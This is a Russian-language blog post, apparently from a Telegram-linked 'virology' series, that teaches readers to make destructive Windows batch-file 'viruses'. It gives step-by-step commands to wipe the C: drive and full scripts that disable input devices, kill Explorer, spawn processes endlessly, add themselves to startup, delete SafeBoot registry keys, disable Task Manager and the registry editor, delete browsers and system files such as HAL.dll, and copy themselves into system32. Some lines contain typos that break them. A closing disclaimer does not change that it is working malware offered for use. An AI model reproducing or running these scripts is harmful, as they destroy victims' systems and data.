Вирусология
April 25, 2020

Убиваем компьютер, с помощью команд.

Представляем вторую часть команд, для файлов с расширением .bat, которые способны навредить компьютеру на операционной системе Windows. Прочесть первую статью на данную тематику можно по этой ссылке.

  • Если у вас есть что дополнить или опровергнуть, то напишите нам @ITtelli.

Для того чтобы создать вирус с расширением .bat, нужно:

  1. Создаём блокнот(текстовый документ) с расширением .txt.
  2. Затем копируем нужную вам команду из представленных и вставляем в блокнот.
  3. Сохраняем файл и меняем расширение с .txt на .bat.
  4. Готово. Достаточно открыть созданный файл, чтоб вирус активировался.

Первая команда будет исключением, так как она не относиться к файлу с расширением .bat. Данные манипуляции убивают Windows, без возможности восстановления. Чтобы это сделать, нам нужно:

  1. Открыть командную строку от Имени Администратора, прописать: cd .., затем нажать ENTER.
  2. Прописываем снова эту же команду: cd .., и жмем ENTER.
  3. После приписываем: rd c:/s/q, и жмем ENTER.(по времени уйдет примерно 5-20 минут)
  4. Прописываем: del c:/s/q, и жмем ENTER.(ждем Тоже Примерно 5-20 Минут)

Готово, не восстановить больше систему. Команда RD и RMDIR позволяют удалять как каталоги, так и дерево каталогов, то есть не только одного указанного каталога, но и всех подкаталогов которые содержаться в указанном пути.

Коды для батников.

Первый вирус отключает клавиатуру и мышь, убивает процесс Проводника, открывает консоль в которой пишется: "Deleting system, n files deleted..." Код:

@echo off
rundll32 mouse,disable > nul
rundll32 keyboard,disable > nul
taskkill /f /im explorer.exe > nul
color 0A
:y
set /a papka+=1
cls
echo Deleting system
echo %papka% files deleted...
goto y

Второй вирус заставит ПК зависнуть, каким бы он мощным не был. Суть его в том, что он начинает бесконечно включать и выключать Paint, вроде ничего такого, а пк начинает лагать. Код:

@echo off
:x
start mspaint
goto x

Ну и наконец самый серьезный вирус. Он способен убрать рабочий стол, удалить ядро системы, удалить драйвера, удалить звуки, понять местами кнопки мыши, удалить браузеры, убить проводник, убить клавиатуру, мышь и монитор, запретить запуск программ и т.д. Данный вирус в конце самоликвидируется. Код:

@echo off
copy %0 %WinDir%\Win32.bat > nul
copy %0 %windir%\Win32.bat > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d %windir%\Win32.bat /f
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
rundll32 mouse,disable > nul
rundll32 keyboard,disable > nul
rundll32 user,disableoemlayer > nul
@echo off
taskkill /im /f chrome.exe
taskkill /im /f ie.exe
taskkill /im /f firefox.exe
taskkill /im /f opera.exe
taskkill /im /f safari.exe
del C:\Program Files\Google\Chrome\Application\chrome.exe /q
del C:\Program Files\Safari\safari.exe /q
del C:\Program Files\Mozilla Firefox\firefox.exe /q
del C:\Program Files\Opera\opera.exe /q
del C:\Program Files\Internet Explorer\ie.exe /q
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
taskkill /f /im explorer.exe > nul
del: *.*/q > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
del %WinDir%\system32\HAL.dll/q > nul
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
del "%SystemRoot%\Media" /q > nul
assoc .lnk=.txt
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
del "%SystemRoot%\Cursors\*.*" >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
copy "%0" "%SystemRoot%\system32\sys321.bat > nul
del %0

С любовью и уважением, от телеграмм канала @CYBERengine.

ВСЯ ИНФОРМАЦИЯ НАПИСАНА В ЦЕЛЯХ ОЗНАКОМЛЕНИЯ И НЕ ПРИЗЫВАЕТ К ДЕЙСТВИЮ.